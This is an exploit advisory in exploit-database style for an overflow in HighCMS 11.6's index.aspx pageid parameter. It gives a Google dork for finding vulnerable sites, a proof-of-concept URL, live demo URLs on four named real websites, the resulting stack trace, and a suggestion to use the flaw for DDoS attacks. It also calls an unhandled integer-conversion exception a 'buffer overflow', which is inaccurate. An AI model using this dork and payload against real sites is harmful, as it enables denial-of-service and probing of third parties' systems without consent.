----------------------------------------------------------------
HighCMS <= (index.aspx) Buffer Overflow Vulnerability
----------------------------------------------------------------
 
# Exploit Title:HighCMS <= (index.aspx) Buffer Overflow Vulnerability
# Google Dork: inurl:index.aspx?siteid=1&pageid=
# Application Name: [HighCMS]
# Date: 2011-10-30
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.aryanic.com/products-highcms.html ]
# Vendor Response(s): They didn't respond to the emails.
# Version: [ 11.6 ]
# Impact : [ Low ]
# Tested on: [Windows Server 2003 /IIS 6.0]
# CVE : Webapps
 
+-----------------------+
| Overflow Exception    |
+-----------------------+

Description: You can use many of these vulnerabilities do Ddos attacks, including refref

# PoC(s):

http://[HOST]/index.aspx?siteid=1&pageid=[Overflow]

http://[HOST]/index.aspx?siteid=1&pageid=4141414141 <> True 

# Demo(s):

http://www.mayadin.biz/index.aspx?siteid=1&pageid=4141414141

http://ielts-house.com/index.aspx?siteid=1&pageid=4141414141

http://www.persiangoldfish.com/index.aspx?siteid=1&pageid=414141414141

http://honarnews.org/index.aspx?siteid=1&pageid=4141414141

# Output Data:

[OverflowException: Arithmetic operation resulted in an overflow.]
   Microsoft.VisualBasic.CompilerServices.Conversions.ToInteger(String Value) +165
   highcms.index.page_select() +1272
   highcms.index.make_page() +2304
   highcms.index.Page_Load(Object , EventArgs ) +8725
   System.Web.UI.Control.OnLoad(EventArgs e) +132
   System.Web.UI.Control.LoadRecursive() +66
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428


# Reference:
[1] For more information about this vulnerability (URL: http://msdn.microsoft.com/en-us/library/system.overflowexception.aspx)
[2] For more information about this vulnerability (URL: https://www.owasp.org/index.php/Buffer_Overflows)
 
# Important Notes:
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.

# Greets To :
 
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp 

ArYaIeIrAn ~ Mikili ~ NoL1m1t ~ cmaxx ~ G3n3Rall ~ Mr.XHat ~ cmaxx 
 
G3n3Rall ~ Mr.XHat ~  M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter

s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ  ./Persian Gulf

===========================================[End]=============================================